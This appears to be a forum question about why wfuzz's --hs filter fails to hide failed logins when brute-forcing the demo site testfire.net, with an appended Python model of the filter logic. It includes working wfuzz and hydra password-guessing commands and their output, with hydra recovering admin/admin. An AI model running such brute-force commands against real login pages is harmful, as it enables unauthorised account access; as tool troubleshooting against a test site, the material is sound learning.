wfuzz shows --hs responses when it should hide them

Test site: http://testfire.net/login.jsp

Error when login failed: Login Failed: We're sorry, but this username or password was not found in our system. Please try again.

Web Form

```html
<form action="doLogin" method="post" name="login" id="login" onsubmit="return (confirminput(login));">
  <table>
    <tbody><tr>
      <td>
        Username:
      </td>
      <td>
        <input type="text" id="uid" name="uid" value="" style="width: 150px;">
      </td>
      <td>
      </td>
    </tr>
    <tr>
      <td>
        Password:
      </td>
      <td>
        <input type="password" id="passw" name="passw" style="width: 150px;">
      </td>
    </tr>
    <tr>
      <td></td>
      <td>
        <input type="submit" name="btnSubmit" value="Login">
      </td>
    </tr>
  </tbody></table>
</form>
```

The actual password is admin too. Therefore, I created a simple passlist.txt for this purpose.

```
wolf@linux:~$ cat passlist.txt
admin
pwd
pass
password
wolf@linux:~$
```

wfuzz flag

```
--ss/hs regex             : Show/Hide responses with the specified regex within the content
```

Here are a few tests, but none of them really work.

```
wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/doLogin
```

```
wolf@linux:~$ wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/doLogin

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://testfire.net/doLogin
Total requests: 4

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000003:   302        0 L      0 W      0 Ch        "pass"
000000004:   302        0 L      0 W      0 Ch        "password"
000000001:   302        0 L      0 W      0 Ch        "admin"
000000002:   302        0 L      0 W      0 Ch        "pwd"

Total time: 0.517212
Processed Requests: 4
Filtered Requests: 0
Requests/sec.: 7.733766
wolf@linux:~$
```

```
wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/login.jsp
```

```
wolf@linux:~$ wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/login.jsp

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://testfire.net/login.jsp
Total requests: 4

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000003:   200        194 L    582 W    8519 Ch     "pass"
000000001:   200        194 L    582 W    8519 Ch     "admin"
000000002:   200        194 L    582 W    8519 Ch     "pwd"
000000004:   200        194 L    582 W    8519 Ch     "password"

Total time: 0.583132
Processed Requests: 4
Filtered Requests: 0
Requests/sec.: 6.859507
wolf@linux:~$
```

It didn't work even though the right user/pass combination was there.

Any idea what’s wrong in this wfuzz syntax?

hydra can do this without any problem and identified the credential accurately.

```
wolf@linux:~$ hydra testfire.net http-post-form \
> '/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed' \
> -l admin -P passlist.txt -V
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 08:57:36
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking http-post-form://testfire.net:80/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed
[ATTEMPT] target testfire.net - login "admin" - pass "admin" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target testfire.net - login "admin" - pass "pwd" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target testfire.net - login "admin" - pass "pass" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target testfire.net - login "admin" - pass "password" - 4 of 4 [child 3] (0/0)
[80][http-post-form] host: testfire.net   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 08:57:39
wolf@linux:~$
```
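The flag description quoted in the question says `--ss/--hs` match a regex "within the content", that is, against the response body. The Python below is an added example, not wfuzz's own code, that models that body filter (together with `--hc`, wfuzz's hide-by-status-code flag) over constructed stand-ins for the two runs above: the `/doLogin` responses are 302s with `0 Ch` bodies, and the `login.jsp` responses are the login form itself, which never contains the failure message. A regex of `Failed` therefore has nothing to match in either run, which is exactly the `Filtered Requests: 0` both runs report. A third, constructed run in which the failure text from the question does appear in the wrong guesses shows the same filter hiding them. The `Response` class, `apply_filters` and the sample bodies are all assumptions made for this illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class Response:
    """A fuzzed response reduced to the fields the modelled filters inspect."""
    payload: str
    code: int
    body: str


def apply_filters(responses, hs=None, ss=None, hc=()):
    """Model of wfuzz's --hs/--ss (regex over the response content) and
    --hc (hide by status code). Returns the responses that would still be
    printed; everything else counts as a filtered request."""
    shown = []
    for r in responses:
        if r.code in hc:
            continue  # hidden by status code
        if hs is not None and re.search(hs, r.body):
            continue  # content matched the hide regex, so hide it
        if ss is not None and not re.search(ss, r.body):
            continue  # content did not match the show regex, so hide it
        shown.append(r)
    return shown


def shown_payloads(responses, **filters):
    """Payloads that survive the filters, in request order."""
    return [r.payload for r in apply_filters(responses, **filters)]


PAYLOADS = ("admin", "pwd", "pass", "password")  # passlist.txt from the question

# Constructed stand-ins for the two runs in the question. /doLogin answered
# every payload with a 302 and an empty body (0 Ch); login.jsp answered with
# the login form, which does not contain the word "Failed".
LOGIN_FORM = ('<form action="doLogin" method="post" name="login" id="login">'
              '<input type="text" id="uid" name="uid">'
              '<input type="password" id="passw" name="passw"></form>')
DOLOGIN_RUN = [Response(p, 302, "") for p in PAYLOADS]
LOGINJSP_RUN = [Response(p, 200, LOGIN_FORM) for p in PAYLOADS]

# Constructed run in which the failure text quoted in the question actually
# appears in the body of each wrong guess; the success body is a placeholder.
FAILED_PAGE = LOGIN_FORM + ("Login Failed: We're sorry, but this username or "
                            "password was not found in our system. Please try again.")
CONSTRUCTED_RUN = [Response("admin", 200, "<h1>constructed success page</h1>")] + [
    Response(p, 200, FAILED_PAGE) for p in PAYLOADS[1:]]


if __name__ == "__main__":
    for name, run in (("doLogin", DOLOGIN_RUN), ("login.jsp", LOGINJSP_RUN),
                      ("constructed", CONSTRUCTED_RUN)):
        kept = shown_payloads(run, hs="Failed")
        print(f"{name:>11}: --hs Failed keeps {kept}, "
              f"filtered {len(run) - len(kept)}")
```

Running it prints all four payloads for both the `doLogin` and `login.jsp` stand-ins with nothing filtered, and only `admin` for the constructed run: a body regex can only hide a response whose body actually carries the text, so a filter chosen from the message the browser eventually displays has to be checked against what the fuzzed request itself returns.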